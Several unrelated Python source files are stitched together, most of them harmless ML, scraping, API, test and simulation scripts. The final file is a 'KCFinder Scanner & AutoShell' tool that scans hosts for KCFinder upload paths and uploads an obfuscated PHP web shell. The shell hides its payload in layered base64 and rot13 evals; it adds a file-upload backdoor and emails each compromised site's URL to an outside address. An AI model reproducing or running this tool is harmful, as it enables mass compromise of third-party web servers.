def getmodelstats(self):
stat = {x: self.__model[x] for x in self.__scorers}
stat.update({'%s_var' % x: self.__model['v%s' % x] for x in self.__scorers})
stat.update(dict(fitparams=self.__model['params'], repetitions=self.__repetitions,
nfolds=self.__nfold, normalize=self.__normalize,
dragostolerance=sqrt(self.__y.var())))
return stat
def getfitpredictions(self):
output = dict(property=self.__y, prediction=self.__model['y_pred'], y_domain=self.__model['y_ad'],
domain=self.__model['x_ad'])
if 'y_prob' in self.__model:
output['probability'] = self.__model['y_prob']
return output
def __splitrange(self, param, dep=0):
tmp = {}
fdep = dep
stepindex = list(range(0, len(param), round(len(param)/10) or 1))
stepindex.insert(0, -1)
stepindex.append(len(param))
for i, j, k in zip(stepindex, stepindex[1:], stepindex[2:]):
tmp[param[j]], tmpd = self.__splitrange(param[i+1:j] + param[j+1:k], dep=dep+1)
if tmpd > fdep:
fdep = tmpd
return tmp, fdep
def __crossval(self):
fitparams = deepcopy(self.fitparams)
fcount = 0
depindex = []
maxdep = []
print('list of fit params:')
print(pd.DataFrame(list(fitparams)))
for param in fitparams:
di = {}
md = 0
for i in param:
if i != 'kernel':
param[i], di[i] = self.__splitrange(param[i])
if di[i] > md:
md = di[i]
depindex.append(di)
maxdep.append(md)
print('========================================\n'
'Y mean +- variance = %s +- %s\n'
' max = %s, min = %s\n'
'========================================' %
(self.__y.mean(), sqrt(self.__y.var()), self.__y.max(), self.__y.min()))
bestmodel = dict(model=None, Cr2=np.inf, Crmse=np.inf, Ckappa=np.inf, Cba=np.inf, Ciap=np.inf)
for param, md, di in zip(fitparams, maxdep, depindex):
var_kern_model = bestmodel
while True:
var_param_model = bestmodel
tmp = self.prepareparams(param)
for i in tmp:
fcount += 1
print('%d: fit model with params:' % fcount, i)
fittedmodel = self.__fit(i, self.__rep_boost)
print(self.__scorereporter % fittedmodel)
if fittedmodel[self.__fitscore] <= var_param_model[self.__fitscore]:
var_param_model = fittedmodel
if var_param_model[self.__fitscore] <= var_kern_model[self.__fitscore]:
var_kern_model = var_param_model
tmp = {}
for i, j in var_kern_model['params'].items():
if i in ('kernel', 'probability'):
tmp[i] = j
elif di[i] < md and not param[i][j]:
tmp[i] = param[i]
else:
tmp[i] = param[i][j]
param = tmp
else:
break
if var_kern_model[self.__fitscore] <= bestmodel[self.__fitscore]:
bestmodel = var_kern_model
if self.__repetitions > self.__rep_boost:
bestmodel = self.__fit(bestmodel['params'], self.__repetitions)
print('========================================\n' +
('SVM params %(params)s\n' + self.__scorereporter) % bestmodel)
print('========================================\n%s variants checked' % fcount)
self.__model = bestmodel
def __fit(self, fitparams, repetitions):
models, y_pred, y_prob, y_ad, x_ad = [], [], [], [], []
fold_scorers = defaultdict(list)
parallel = Parallel(n_jobs=self.__n_jobs)
kf = list(KFold(len(self.__y), n_folds=self.__nfold))
setindexes = np.arange(len(self.__y.index))
folds = parallel(delayed(_kfold)(self.estimator, self.__x, self.__y, s[train], s[test],
fitparams, self.__normalize, self.__box)
for s in (self.__shuffle(setindexes, i) for i in range(repetitions))
for train, test in kf)
# street magic. split folds to repetitions
for kfold in zip(*[iter(folds)] * self.__nfold):
ky_pred, ky_prob, ky_ad, kx_ad = [], [], [], []
for fold in kfold:
ky_pred.append(fold.pop('y_pred'))
ky_ad.append(fold.pop('y_ad'))
kx_ad.append(fold.pop('x_ad'))
if 'y_prob' in fold:
ky_prob.append(fold.pop('y_prob'))
fold.pop('y_test')
models.append(fold)
ky_pred = pd.concat(ky_pred).loc[self.__y.index]
ky_ad = pd.concat(ky_ad).loc[self.__y.index]
kx_ad = pd.concat(kx_ad).loc[self.__y.index]
if ky_prob:
ky_prob = pd.concat(ky_prob).loc[self.__y.index].fillna(0)
y_prob.append(ky_prob)
for s, (f, p) in self.__scorers.items():
fold_scorers[s].append(f(self.__y, (ky_prob if p else ky_pred)))
y_pred.append(ky_pred)
y_ad.append(ky_ad)
x_ad.append(kx_ad)
y_pred = pd.concat(y_pred, axis=1)
y_ad = pd.concat(y_ad, axis=1)
x_ad = pd.concat(x_ad, axis=1)
res = dict(model=models, params=fitparams, y_pred=y_pred, y_ad=y_ad, x_ad=x_ad)
if y_prob:
res['y_prob'] = pd.concat(y_prob, axis=1, keys=range(len(y_prob)))
for s, _v in fold_scorers.items():
if isinstance(_v[0], Score):
m, v, c = Score(), Score(), Score()
tmp = defaultdict(list)
for _s in _v:
for k, val in _s.items():
tmp[k].append(val)
for k, val in tmp.items():
m[k] = np.mean(val)
v[k] = sqrt(np.var(val))
c[k] = -m[k] + self.__dispcoef * v[k]
else:
m, v = np.mean(_v), sqrt(np.var(_v))
c = (1 if s == 'rmse' else -1) * m + self.__dispcoef * v
res.update({s: m, 'C%s' % s: c, 'v%s' % s: v})
return res
@staticmethod
def __shuffle(setindexes, seed):
""" shuffling method for CV. may be smartest.
"""
shuffled = shuffle(setindexes, random_state=seed)
return shuffled
def predict(self, structures, **kwargs):
res = self.__descriptorgen.get(structures, **kwargs)
d_x, d_ad, d_s = res['X'], res['AD'], res.get('structures')
pred, prob, x_ad, y_ad = [], [], [], []
for i, model in enumerate(self.__model['model']):
x_t = pd.DataFrame(model['normal'].transform(d_x), columns=d_x.columns) if model['normal'] else d_x
y_p = pd.Series(model['model'].predict(x_t), index=d_x.index)
pred.append(y_p)
if hasattr(model['model'], 'predict_proba'):
y_pa = pd.Series(model['model'].predict_proba(x_t), index=d_x.index)
prob.append(y_pa)
y_ad.append((y_p >= model['y_min']) & (y_p <= model['y_max']))
x_ad.append(((d_x.loc[:, self.__box] - model['x_min']).min(axis=1) >= 0) &
((model['x_max'] - d_x.loc[:, self.__box]).min(axis=1) >= 0) & d_ad)
out = dict(prediction=pd.concat(pred, axis=1),
domain=pd.concat(x_ad, axis=1), y_domain=pd.concat(y_ad, axis=1))
if prob:
out['probability'] = pd.concat(prob, axis=1, keys=range(len(prob)))
if d_s is not None:
out['structures'] = d_s
return out
|
# http://www.practicepython.org/exercise/2014/07/14/19-decode-a-web-page-two.html
from bs4 import BeautifulSoup
import requests
url = requests.get("http://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture")
sopa = BeautifulSoup(url.text, "lxml")
titulo = sopa.find("h1")
subtitulo = titulo.find_next("span")
texto = sopa.find_all("p")
print(titulo.get_text())
print(subtitulo.get_text())
for parrafo in texto:
try:
if int(parrafo.attrs["data-reactid"]) < 457:
print (parrafo.get_text())
except:
pass
|
from ._uirevision import UirevisionValidator
from ._sector import SectorValidator
from ._radialaxis import RadialAxisValidator
from ._hole import HoleValidator
from ._gridshape import GridshapeValidator
from ._domain import DomainValidator
from ._bgcolor import BgcolorValidator
from ._barmode import BarmodeValidator
from ._bargap import BargapValidator
from ._angularaxis import AngularAxisValidator
|
import io
with io.open('1000english.txt', 'r', encoding='utf8') as f:
english_words = set(word.strip().lower() for word in f)
with io.open('1000welsh.txt', 'r', encoding='utf8') as g:
welsh_words = set(word.strip().lower() for word in g)
def is_english_word(word):
return word.lower() in english_words
def is_welsh_word(word):
return word.lower() in welsh_words
wheel1 = ('s', 't', 'd', 'm', 'r', 'f', 'b', 'l', 'p', 'w')
wheel2 = ('w', 'r', 'y', 'u', 'a', 'i', 'o', 'l', 'e', 'h')
wheel3 = ('r', 'm', 't', 'n', 's', 'k', 'o', 'a', 'l', 'e')
wheel4 = ('g', 'k', 'm', 's', 't', 'e', 'p', 'y', 'l', 'd')
i = 0
for w1 in wheel1:
for w2 in wheel2:
for w3 in wheel3:
for w4 in wheel4:
testword = w1+w2+w3+w4
if (is_english_word(testword) or is_welsh_word(testword)):
print(i, testword)
i += 1
|
"""
7. Faça um Programa que calcule a área de um quadrado, em seguida mostre o dobro desta área para o usuário.
"""
lado_quadrado = float(input("Digite o comprimento de um lado do quadrado: "))
area_quadrado = lado_quadrado * 2
dobro_area = 2 * area_quadrado
print(f"A área do quadrado é igual a {area_quadrado}m2 e o dobro desta área é igual a {dobro_area}") |
import FunctionsForModuleCreations2
number = int(input("enter a number = "))
(FunctionsForModuleCreations2.num(number)) |
dictionary = {
'1' : 'One',
'2' : 'Two',
'4' : 'Four',
'5' : 'Five',
'6' : 'Six',
'7' : 'Seven',
'8' : 'Eight',
}
dictionary[9] = ['soda', 'loli']
# print(dictionary)
zx = {
1 : {'we', 'are', 'great'},
2 : {'we', 'are', 'great'}
}
# print(zx)
# print(type(zx))
# TABLE for a single number
def table_1():
val = 9
for i in range(1,11):
cal = val * i
print(val, 'x', i , '=', cal)
# table_1()
# Output_1 =
# 9 x 1 = 9
# 9 x 2 = 18
# 9 x 3 = 27
# 9 x 4 = 36
# 9 x 5 = 45
# 9 x 6 = 54
# 9 x 7 = 63
# 9 x 8 = 72
# 9 x 9 = 81
# 9 x 10 = 90
# Table for multiple numeber
def table_2():
base_val = range(1,13)
sc_num = range(1,11)
table_title = 1
for fst_c in base_val:
print('_____''Table of - ', table_title,'_____')
table_title += 1
for scnd_c in sc_num:
cal = fst_c * scnd_c
print(fst_c, 'x' , scnd_c, '=', cal)
else:
print('_____________________________')
# table_2() |
# libraries
import pickle
import numpy as np
import pandas as pd
import fbprophet as prop
from keras.models import load_model
def predict_arima(trained_model, predict_type, n_periods, df_train=None, df_test=None):
assert predict_type in ('once', 'sequential')
# load the trained model
with open(trained_model, 'rb') as pkl:
model = pickle.load(pkl)
if predict_type is 'once':
pred = model.predict(n_periods=n_periods)
else:
n_tot = df_test.shape[0]
df_train_new = df_train.copy()
pred = []
for i in range(n_tot):
model = model.fit(df_train_new)
pred.append(model.predict(n_periods=1)[0])
# update df_train
df_train_new = pd.concat([df_train_new, df_test.iloc[[i]]])
pred = np.array(pred)
pred = pred.reshape((pred.shape[0], 1))
return pred
def predict_prophet(trained_model, n_periods):
# NOTE: prophet does not obtain sequential predictions. If train data is updated, a new model has to be fitted
# load the trained model
with open(trained_model, 'rb') as pkl:
model = pickle.load(pkl)
prophet_future = model.make_future_dataframe(periods=n_periods)
pred = model.predict(prophet_future)
return pred
def predict_lstm(trained_model, dat):
# load model
model = load_model(trained_model)
# make predictions
pred = model.predict(dat)
return pred
|
class Movie(object):
"""
A movie object stores a movie's title, genres, and description.
"""
def __init__(self, title, genres, description):
"""
Initializes a Movie object.
title: string, movie's title
genres: list of strings, movie's genres
description: string, movie's description
"""
self.title = title
self.genres = genres
self.description = description
def __eq__(self, other):
"""
Checks if one Movie object is equal to another based on the movie's title.
return: boolean
"""
if isinstance(self, other.__class__):
return self.title == other.get_title()
return False
def __hash__(self):
"""
Creates a hash value for the Movie object based on the movie's title.
return: int, hash value
"""
return hash(self.title)
def get_title(self):
"""
return: string, the movie's title
"""
return self.title
def get_genre(self):
"""
return: a list of strings, movie's genres
"""
return self.genres
def get_description(self):
"""
return: string, the movie's description
"""
return self.description
def __str__(self):
"""
Creates a new div element for the movie.
return: string, a div element that will be used to display the movie
"""
div = ("<div class='movie'>"+
"<div class='title'>" + self.title + "</div>" +
"<div class='genres'>" + ' '.join(map(str, self.genres)) + "</div>" +
"<div class='description'>" + self.description + "</div>" +
"</div> <hr/>")
return div
|
# Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
import numpy
import pytest
import cunumeric
# Code written using the NumPy interface
def step1(np, n):
return np.ones(n), np.ones(n)
def step2(np, x, y):
return np.dot(x, y)
def test_interop():
# Malicious adoption strategy
numpy_likes = [numpy, cunumeric]
for x in range(10):
x, y = step1(random.choice(numpy_likes), 1000000)
step2(random.choice(numpy_likes), x, y)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
|
#importamos todas las clases y funciones de las otras carpetas
from db.user_db import UserInDB
from db.user_db import update_user, get_user
from db.transaction_db import TransactionInDB
from db.transaction_db import save_transaction
from models.user_models import UserIn, UserOut
from models.transaction_models import TransactionIn, TransactionOut
#importamos las librerias que vamos a usar
import datetime
from fastapi import FastAPI
from fastapi import HTTPException # retorna los errores con los codigos de status
api = FastAPI()#creamos la aplicacion -> RESTAPI
################## funcionalidad ################}
#funcionalidad de autenticacion
@api.post("/user/auth/")#decorador: la funcion se ejecutara cuando se use la siguiente URL
#funcion asyncrona, que se ejecuta en desorden(en el momento que se ejecute)
async def auth_user(user_in: UserIn):#funcion que usa un objeto usuario entrada(uss,pass)
user_in_db = get_user(user_in.username)#creo una variable y la igualo con la busqueda del nombre del objeto ingresado
if user_in_db == None:
raise HTTPException(status_code=404, detail="El usuario no existe")#raise lanza el error
if user_in_db.password != user_in.password:
return {"Autenticado": False}
return{"Autenticado": True}
#funcionalidad balance
@api.get("/user/balance/{username}")#ojo con el llamado del usuario en la url
async def get_balance(username: str):
user_in_db = get_user(username)#retorna el objeto llamado y lo guarda en una variable
if user_in_db == None:
raise HTTPException(status_code=404, detail="El usuario no existe")
#UserOut solo utiliza 2 atributos(user y balance)
#el doble "**" mapea y toma los valores que necesita del diccionario
#se usa el .dict() para que lo tome como diccionario y pueda mapear
user_out = UserOut(**user_in_db.dict())
return user_out
#funcionalidad transaccion
@api.put("/user/transaction/")
async def make_transaction(transaction_in: TransactionIn): #entra modelo transaccion
user_in_db = get_user(transaction_in.username)#valida usuario
if user_in_db == None:
raise HTTPException(status_code=404, detail="El usuario no existe")
if user_in_db.balance < transaction_in.value:#valida el saldo con lo que se retirara
raise HTTPException(status_code=400, detail="Sin fondos suficientes")
# ya todo validado
user_in_db.balance = user_in_db.balance - transaction_in.value #resta la transaccion del saldo
update_user(user_in_db)#actualiza la base de datos
#creamos el un objeto trnasaccionIN con el mapeo de la transaccion
transaction_in_db = TransactionInDB(**transaction_in.dict(),
actual_balance=user_in_db.balance)#guarda el balance del usuario en ese momento como un atributo suyo
transaction_in_db = save_transaction(transaction_in_db)#guarda esa transaccionIN
transaction_out = TransactionOut(**transaction_in_db.dict())#crea la TransaccionOUT con su mapeo
return transaction_out#retorna el modelo de transaccion OUT
|
from utils.function.setup import *
from utils.lib.user_data import *
from main.activity.desktop_v3.activity_login import *
from main.activity.desktop_v3.activity_logout import *
from main.activity.desktop_v3.activity_user_settings import *
import unittest
class TestProfile(unittest.TestCase):
#Instance
_site = "beta"
def setUp(self):
test_driver = ""
self.driver = tsetup("chrome")
self.flag = 0
def test_edit_profile(self):
print("> ::TEST EDIT PROFILE::")
print("=======================")
driver = self.driver
self.user= user8
email = self.user['email']
pwd = self.user['password']
#Object Activity
loginValidate = loginActivity()
logoutValidate = logoutActivity()
editProfile = settingProfileActivity()
#--
loginValidate.do_login(driver, self.user, email, pwd, self._site)
editProfile.profile_data(driver, "input hobby here", "input messenger here", pwd)
logoutValidate.do_logout(driver, self._site)
def test_edit_password(self):
print("> ::TEST EDIT PASSWORD::")
print("========================")
driver = self.driver
self.user= user8
email = self.user['email']
pwd = self.user['password']
#Object Activity
loginValidate = loginActivity()
logoutValidate = logoutActivity()
editPassword = settingProfileActivity()
#--
loginValidate.do_login(driver, self.user, email, pwd, self._site)
editPassword.profile_password(driver, pwd, "123456789")
logoutValidate.do_logout(driver, self._site)
def test_edit_picture(self):
print("> ::TEST EDIT PICTURE::")
print("=======================")
driver = self.driver
self.user= user8
email = self.user['email']
pwd = self.user['password']
#Object Activity
loginValidate = loginActivity()
logoutValidate = logoutActivity()
editPicture = settingProfileActivity()
#--
loginValidate.do_login(driver, self.user, email, pwd, self._site)
editPicture.profile_picture(driver)
logoutValidate.do_logout(driver, self._site)
def tearDown(self):
print("> ::Testing has done, the browser window will be closed soon::")
self.driver.quit()
if __name__ == '__main__':
unittest.main(warnings='ignore') |
from urllib import request
import tarfile
import argparse
import json
from pathlib import Path
JOPLIN_PORT_RANGE = (41184, 41194)
JOPLIN_PING_RESPONSE = "JoplinClipperServer"
JOPLIN_RESOURCES_PATH = "resources/"
JOPLIN_RESOURCE_ID_LEN = 32
def get_joplin_port():
for port in range(*JOPLIN_PORT_RANGE):
print("trying port", port, end=" ")
req = request.Request(f"http://localhost:{port}/ping")
try:
with request.urlopen(req) as f:
print(f.status, f.reason, end=" ")
if f.status == 200 and f.read().decode("utf-8") == JOPLIN_PING_RESPONSE:
print("port find!")
return port
except Exception as e:
print("not the port, skipping")
print("port not found")
return None
def auth(port, provided_token = None):
if provided_token is not None:
print("using provided token")
return provided_token
if Path(".joplin_token").exists():
with open(".joplin_token","r",encoding="utf8") as f:
resp = json.load(f)
print("loading token from file")
return resp["token"]
print("no existing token found, requesting")
req = request.Request(f"http://localhost:{port}/auth")
with request.urlopen(req, data=b"") as f:
print(f.status, f.reason)
if f.status == 200:
resp = json.loads(f.read().decode("utf-8"))
print("Token requested. Please check the joplin app to grant access.")
input("Press enter after granting access.")
token = resp["auth_token"]
req = request.Request(f"http://localhost:{port}/auth/check?auth_token={token}")
with request.urlopen(req) as f:
print(f.status, f.reason)
if f.status == 200:
resp = json.loads(f.read().decode("utf-8"))
print(resp)
if resp["status"] == "accepted":
print("auth success!")
with open(".joplin_token","w",encoding="utf8") as f:
print("saving token to file")
json.dump(resp, f)
return resp["token"]
def get_joplin_resources(port, token, limit):
has_more = True
resources = []
page = 1
# set default
if limit is None or not 0 < limit and limit <= 100:
limit = 50
while has_more:
print(f"requesting page {page}...", end=" ")
req = request.Request(f"http://localhost:{port}/resources?token={token}&limit={limit}&page={page}")
with request.urlopen(req) as f:
print(f.status, f.reason, end=" ")
if f.status == 200:
resp = json.loads(f.read().decode("utf-8"))
# print(resp)
resources += resp["items"]
has_more = resp["has_more"]
page += 1
print(f"got {len(resp['items'])}, total {len(resources)}, has_more {has_more}")
return resources
def read_jex_resources(jex_path):
with tarfile.open(jex_path, "r") as f:
files = f.getmembers()
resources = [f.name.replace(JOPLIN_RESOURCES_PATH,"")[:JOPLIN_RESOURCE_ID_LEN]
for f in files if f.name.startswith(JOPLIN_RESOURCES_PATH)]
return resources
def diff(referred, all):
all_id_to_title_dict = {item["id"]:item["title"] for item in all}
referred_set = set(referred)
all_set = set(all_id_to_title_dict.keys())
referred_subsets_all = referred_set.issubset(all_set)
if not referred_subsets_all:
raise Exception("Sanity check failed: referred ids is not a subset of all attachment ids!")
not_referred = set(all_set).difference(referred_set)
print("orphaned count:", len(not_referred))
print("")
print("id - filename")
print("--------------------------------------")
for id in not_referred:
print(f"{id} - {all_id_to_title_dict[id]}")
print("--------------------------------------")
print()
return not_referred
def do_delete(not_referred, port,token):
not_referred_len = len(not_referred)
for idx, id in enumerate(not_referred):
print(f"deleting {idx+1} of {not_referred_len}, id={id}", end=" ")
req = request.Request(f"http://localhost:{port}/resources/{id}?token={token}", method="DELETE")
with request.urlopen(req) as f:
print(f.status, f.reason, end=" ")
if f.status == 200:
print("deleted")
else:
raise Exception("deletion failed, exiting...")
def main(args):
port = args.port
if not port:
port = get_joplin_port()
if port is None:
raise Exception("failed to connect to joplin port...")
token = args.token
if not token:
token = auth(port)
if token is None:
raise Exception("failed to obtain joplin API token...")
referred = read_jex_resources(args.jex_path)
all = get_joplin_resources(port, token, limit=args.limit)
print(f"referred: {len(referred)}, all {len(all)}")
not_referred = diff(referred, all)
if len(not_referred) == 0:
print("No need to vacuum.")
return
if not args.confirm:
print('Confirm flag (--confirm) not set. Exiting without any deletion.')
return
if args.test_del_1:
to_be_removed = [list(not_referred)[0]]
else:
to_be_removed = list(not_referred)
do_delete(to_be_removed, port, token)
print("Done.")
if __name__ == "__main__":
description = """
Joplin Vacuum Cleaner
Removes attachments that are not referred.
!!! Always backup before using this tool and use at your own risk. !!!
Before using the script, you need to export your notes as a JEX file (Joplin Export File). The process of exporting
notes checks the reference of attachments, and attachments that are no longer referenced is not exported. The script
works out attachments not referred by calculating attachment ids that appears in Joplin Note Attachment Panel but
not in the exported file.
By default, only a list of not referred attachments are generated (i.e. dryrun). No deletion will take place unless
"confirm" flag is set ("--confirm").
For the first run, the script will request an API token from Joplin. The token will be store in the ".joplin_token"
file under the same directory as the script. Subsequent requests will reuse the token.
"""
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("jex_path", type=str, help="Path to the JEX file")
parser.add_argument("--port", type=int, default=None, help="the port used to connect to Joplin, leave blank for auto query")
parser.add_argument("--token", type=str, default=None, help="override API token")
parser.add_argument("--limit", type=int, default=50, help="pagenation limit for querying attachments from Joplin")
parser.add_argument("--confirm", action='store_true', help="Confirm deletion")
parser.add_argument("--test-del-1",action='store_true', help="(For testing purpose) Removing one not referred attachment. Need to be used with confirm.")
args = parser.parse_args()
main(args)
|
#!/usr/bin/env python3
"""Fit the Lotka-Volterra with prey density dependence rR(1 - R/K), plot and save population dynamics between consumer and resource with input from command line"""
__appname__ = '[LV3.py]'
__author__ = 'Zongyi Hu (zh2720@ic.ac.uk)'
__version__ = '0.0.1'
# import packages
import scipy as sc
import numpy as np
import scipy.integrate as integrate
import matplotlib.pylab as p
import sys
# define a function that returns the growth rate of consumer and resource population at any given time step
def dCR_dt(pops):
"""Lotka-Volterra (LV) model for a predator-prey system in two-dimensional space"""
R = pops[0]
C = pops[1]
Rnext = R * (1 + r * (1 - R / K) - a * C)
Cnext = C * (1 - z + e * a * R)
return np.array([Rnext, Cnext])
def plot1(pops, t):
"""plot 2 lines showing consumer and resource population dynamic among time"""
# create an empty figure object
f1 = p.figure()
# plot consumer density and resource density
p.plot(t, pops[:,0], 'g-', label = 'Resource density')
p.plot(t, pops[:,1], 'b-', label = 'Consumer density')
p.grid()
p.legend(loc='best')
p.xlabel('Time')
p.ylabel('Population density')
p.title('Consumer-Resource population dynamics')
# save the figure as a pdf
f1.savefig('../results/LV3_model.pdf')
def plot2(pops):
""" plot another figure whose x is resource density, y is consumer density"""
# create an empty figure object
f2 = p.figure()
# plot consumer density and resource density in another way
p.plot(pops[:,0], pops[:,1], 'r-')
p.grid()
p.xlabel('Resource density')
p.ylabel('Consumer density')
p.title('Consumer-Resource population dynamics')
# save the figure as a pdf
f2.savefig('../results/LV3_model1.pdf')
def main(argv):
"""main function of the program"""
# read parameters from command line
global r, a, z, e, K
r = 0.05
a = 0.05
z = 0.05
e = 0.02
# define K
K = 10000
# set the initial conditions for the two populations, convert the two into an array
R0 = 10
C0 = 5
RC0 = np.array([R0, C0])
# define population density array
pops = np.array([[R0, C0]])
# define starting point of time
t = 0
# creat 1000 density data of each population
while t < 999:
RC0 = dCR_dt(RC0)
pops = np.append(pops, [[RC0[0], RC0[1]]], axis = 0)
t = t + 1
# define total t series
t = np.array(range(1000))
# plot population dynamic of consumer and resource and save pictures
plot1(pops, t)
plot2(pops)
if __name__ == "__main__":
"""Makes sure the "main" function is called from the command line"""
status = main(sys.argv)
sys.exit(status)
|
import requests
from os import system,chdir,mkdir
from time import sleep
import concurrent.futures
system('clear')
la7mar = '\033[91m'
la5dhar = '\033[92m'
labyadh = '\033[00m'
green = "\033[0;32m"
red = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
auth = """{} MCA-BD Kcfinder Scanner & AutoShell{}
____ _ _ _____ _ _ _
| _ \| | | | | __ \| | (_) | |
| |_) | | __ _ ___| | __ | |__) | |__ _ ___| |__
| _ <| |/ _` |/ __| |/ / | ___/| '_ \| / __| '_ \
| |_) | | (_| | (__| < | | | | | | \__ \ | | |
|____/|_|\__,_|\___|_|\_\ |_| |_| |_|_|___/_| |_|
______
|______|
Version: 1.0.0
{} We Don’t Responsible For Any illegal Activists {}
""".format(la7mar,green,la7mar,green)
print(auth)
target = ["kcfinder/","assets/ckeditor/kcfinder/","assets/libs/kcfinder/","panel/kcfinder/","assets/plugins/ckeditor/kcfinder/","admin/ckeditor/kcfinder/","libraries/jscripts/kcfinder/","ckeditor/kcfinder/","js/ckeditor/kcfinder","scripts/jquery/kcfinder/","kcfinder-2.51/","assets/js/mylibs/kcfinder/"]
kcfile = """
<title>Vuln!! patch it Now!</title>
<?php
/*
if You Decode This, Congratulations You Are 1337
Encoded By Black_Phish
*/
eval("?>".base64_decode("PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFy
dCgpOwplY2hvIGJhc2U2NF9kZWNvZGUoIlBDRkVUME5VV1ZCRklHaDBiV3crQ2p4b2RHMXNQZ284
YUdWaFpENEtJQ0E4ZEdsMGJHVStWWEJzYjJGa0lIbHZkWElnWm1sc1pYTTgKTDNScGRHeGxQZ284
TDJobFlXUStDanhpYjJSNVBnb2dJRHhtYjNKdElHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1i
M0p0TFdSaApkR0VpSUdGamRHbHZiajBpSWlCdFpYUm9iMlE5SWxCUFUxUWlQZ29nSUNBZ1BIQStW
WEJzYjJGa0lIbHZkWElnWm1sc1pUd3ZjRDRLCklDQWdJRHhwYm5CMWRDQjBlWEJsUFNKbWFXeGxJ
aUJ1WVcxbFBTSjFjR3h2WVdSbFpGOW1hV3hsSWo0OEwybHVjSFYwUGp4aWNpQXYKUGdvZ0lDQWdQ
R2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzlwYm5CMWRE
NEtJQ0E4TDJadgpjbTArQ2p3dlltOWtlVDRLUEM5b2RHMXNQZz09Iik7Cj8+"));eval("?>".base64_decode("PD9waHAKCWZ1bmN0aW9uIFhrQWtha0FqVEhzanNhakFqcygkY29kZSl7CgkkY29kZSA9IHN0cl9z
cGxpdCgkY29kZSw1KTsKCSRpID0gMDsKCWZvcmVhY2goJGNvZGUgYXMgJHgpewoJJHggPSBzdHJf
cm90MTMoJHgpOwoJICRibGFja1skaV09ICR4OwoJJGkrKzsKCX0KCSRieXRlcyA9IGh0bWxzcGVj
aWFsY2hhcnNfZGVjb2RlKGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKGltcGxvZGUoJGJsYWNrKSkp
KTsKCWV2YWwoJz8+Jy4kYnl0ZXMpOwoJfQogPz4="));$coded = file(__FILE__);eval("?>".base64_decode("PD9waHAKZnVuY3Rpb24gZml4KCR4KXsKICR4ID0gc3RyX3JlcGxhY2UoIl9faGFsdF9jb21waWxl
cigpOyIsIiIsJHgpOwogcmV0dXJuICR4Owp9CiRYbSA9IGZpeCgkY29kZWRbY291bnQoJGNvZGVk
KS0xXSk7ClhrQWtha0FqVEhzanNhakFqcygkWG0pOwo/Pg=="));
__halt_compiler();Jmx0Oz9QSFANCiAgaWYoIWVtcHR5KCRfRklMRVNbJ3VwbG9hZGVkX2ZpbGUnXSkpDQogIHsNCiAgICAkcGF0aCA9ICZxdW90Oy4vJnF1b3Q7Ow0KICAgICRwYXRoID0gJHBhdGggLiBiYXNlbmFtZSggJF9GSUxFU1sndXBsb2FkZWRfZmlsZSddWyduYW1lJ10pOw0KICAgIGlmKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyd1cGxvYWRlZF9maWxlJ11bJ3RtcF9uYW1lJ10sICRwYXRoKSkgew0KICAgICAgZWNobyAmcXVvdDtUaGUgZmlsZSAmcXVvdDsuICBiYXNlbmFtZSggJF9GSUxFU1sndXBsb2FkZWRfZmlsZSddWyduYW1lJ10pLiANCiAgICAgICZxdW90OyBoYXMgYmVlbiB1cGxvYWRlZCZxdW90OzsNCiAgICB9IGVsc2V7DQogICAgICAgIGVjaG8gJnF1b3Q7VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiEmcXVvdDs7DQogICAgfQ0KICB9DQogLy9DaGFuZ2UgIFlvdXIgTWFpbA0KIA0KIGlmKCFpc3NldCgkX1NFU1NJT05bJnF1b3Q7dmlzaXQmcXVvdDtdKSl7DQokdXJsID0gICZxdW90O2h0dHA6Ly8mcXVvdDsuICRfU0VSVkVSWydIVFRQX0hPU1QnXS4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQokaGVhZGVycyA9ICZxdW90O0Zyb206IHdlYm1hc3RlckBleGFtcGxlLmNvbSZxdW90OzsNCm1haWwoJ3JtMjE3NDcxNEBnbWFpbC5jb20nLCdXb3JkcHJlc3MgTGluayBHZW5lcmF0ZScsJHVybCwkaGVhZGVycyk7DQp9DQokX1NFU1NJT05bJnF1b3Q7dmlzaXQmcXVvdDtdID0gJnF1b3Q7b2smcXVvdDs7DQo
"""
files = {'file': ('blackphish.php5', kcfile.encode('utf-8'))}
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
def scan(x):
st = x.strip()
for dork in target:
link = "http://"+st+"/"+dork
try:
r = requests.get(link+"browse.php",timeout=10,headers=headers)
ripon = r.text
if "<title>KCFinder: /files</title>" in ripon or "kc_CKEditor" in ripon or "kcact:upload" in ripon:
sent = "https://"+st+"/"+dork+"upload.php"
try:
requests.post(sent,files=files,timeout=10,headers=headers)
lib = requests.get(link+"upload/files/blackphish.php5",timeout=10,headers=headers)
if "Vuln!!" in lib.text:
print(g+" - "+w+st+c+" ---> "+w+" Kcfinder-Shell "+g+"YES!"+w)
open("result/Shellz.txt","a").write(lib.url+"\n")
else:
open("result/kcfinder-path.txt","a").write(link+"browse.php\n")
print(g+" - "+w+st+c+" ---> "+w+" Kcfinder-Path "+g+"YES!"+w)
except Exception as e:
pass
break
else:
